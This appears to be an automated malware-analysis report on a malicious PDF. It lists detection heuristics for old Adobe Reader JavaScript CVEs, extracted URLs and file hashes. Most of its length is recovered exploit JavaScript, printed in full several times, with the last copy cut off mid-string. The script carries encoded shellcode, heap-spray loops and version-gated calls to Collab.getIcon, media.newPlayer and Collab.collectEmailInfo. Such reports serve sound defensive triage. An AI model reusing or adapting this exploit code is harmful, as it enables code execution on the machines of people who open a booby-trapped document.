Malware Insights
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The PDF_EMBEDDED heuristic further points to an embedded stream that likely carries malicious code. The presence of String.fromCharCode indicates obfuscation techniques commonly used in malicious scripts. While the exact script content is truncated, the overall structure and heuristics suggest it is designed to download and execute a secondary payload from a remote source, potentially the unknown-reputation URL found in the document.
Machine Learning
- Nyx PDF Classifier malicious score 0.8654
Heuristics (11)
- media.newPlayer — CVE-2009-4324 [critical, CVE exact, CVE_2009_4324]: PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE exact, CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- Multi-CVE Adobe Reader JavaScript exploit kit [critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low, 2 related findings, PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
- PDF JavaScript exploit cluster [critical, PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  var strtmp = String.fromCharCode(118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,69,66,57,48,37,117,53,69,49,97,37,117,53,66,53,54,37,117,48,54,56,97,37,117,51,48,51,99,37,117,49,54,55,52,37,117,69,48,99,48,37,117,52,54,48,52,37,117,50,54,56,97,37,117,69,52,56,48,37,117,48,50,48,102,37,117,56,56,99,52,37,117,52,51,48,51,37,117,69,66,52,54,37,117,69,56,101,57,37,117,70, …
- Embedded JS stream [low, PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
- Generic recovered JavaScript exploit stage [high, PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Embedded file [low, PDF_EMBEDDED]: PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
- XFA form [low, PDF_XFA]: PDF uses XML Forms Architecture — can contain script logic (matched inside decoded stream)
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs:
  - http://www.pdf-repair.com (in PDF document text)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://www.w3.org/1999/xhtml (referenced by PDF JavaScript)
  - http://www.xfa.org/schema/xfa-data/1.0/ (referenced by PDF JavaScript)
Extracted artifacts (5)
Files carved from inside the sample during analysis.

stream_005_off00000dce.bin
- Kind: decompressed-pdf-stream
- Source: PDF FlateDecoded stream at offset 0xDCE
- Size: 1561 bytes
- SHA-256: cbe1b955fe14978dd5b4deb7f55d7dc6c70a823dc68ee664d01d8cd97c718177

generic_stage_recovery_000.js
- Kind: deobfuscated-js
- Source: generic stage recovery fromCharCode-args from decompressed stream at offset 0x1164
- Size: 7513 bytes
- SHA-256: ac1193fbfef7e653f2145890a293c08f22dc2e7a1179bb2a8723ff2ecf90307e
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 25 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%
u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6
b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");
function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
var strtmp = "headersize = 10;"+
"acl = headersi"+
"ze+garbage.length;"+
"whi"+
"le (nopb"+
"lock.length<acl) nopb"+
"lock+=nopblock;"+
"fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.subs"+"tring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) me"+"mory[i] = blo"+"ck + gar"+"bage;var buffe"+"rsize = 4012;var buf"+"fer = Arra"+"y(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}
function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}
if (app.viewerVersion > 9.0)
{
do2();
}
function re(count,what)
{
var v = "";
while (--count >= 0)
v += what;
return v;
}
function start()
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
if (app.viewerVersion >= 8.0)
{
do1();
}
else
{
var strtmp2 = "var shaft = app.set"+"TimeOut(\"start()\",1200);";
eval(strtmp2);
}

generic_stage_recovery_001.js
- Kind: deobfuscated-js
- Source: generic stage recovery percent-decode from decompressed stream at offset 0x1164
- Size: 7505 bytes
- SHA-256: 8e9de13832805893c17c363767427975c4af91b5c324e9a75f2f633bd4237550
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 25 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%
u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6
b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");
function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
var strtmp = "headersize = 10;"+
"acl = headersi"+
"ze+garbage.length;"+
"whi"+
"le (nopb"+
"lock.length<acl) nopb"+
"lock+=nopblock;"+
"fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.subs"+"tring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) me"+"mory[i] = blo"+"ck + gar"+"bage;var buffe"+"rsize = 4012;var buf"+"fer = Arra"+"y(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("
");
}
var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}
function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}
if (app.viewerVersion > 9.0)
{
do2();
}
function re(count,what)
{
var v = "";
while (--count >= 0)
v += what;
return v;
}
function start()
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
if (app.viewerVersion >= 8.0)
{
do1();
}
else
{
var strtmp2 = "var shaft = app.set"+"TimeOut(\"start()\",1200);";
eval(strtmp2);
}

generic_stage_recovery_002.js
- Kind: deobfuscated-js
- Source: generic stage recovery fromCharCode-args -> split-literal-normalize from decompressed stream at offset 0x1164
- Size: 7375 bytes
- SHA-256: 9742ee1859d53c0052aefeafcefc5daaae3ebddb8819af56a2e6bc73ddb81b1b
Detection
- ClamAV: Pdf.Exploit.Agent-35646
- Obfuscation or payload: likely (carved artifact contains 26 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%
u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6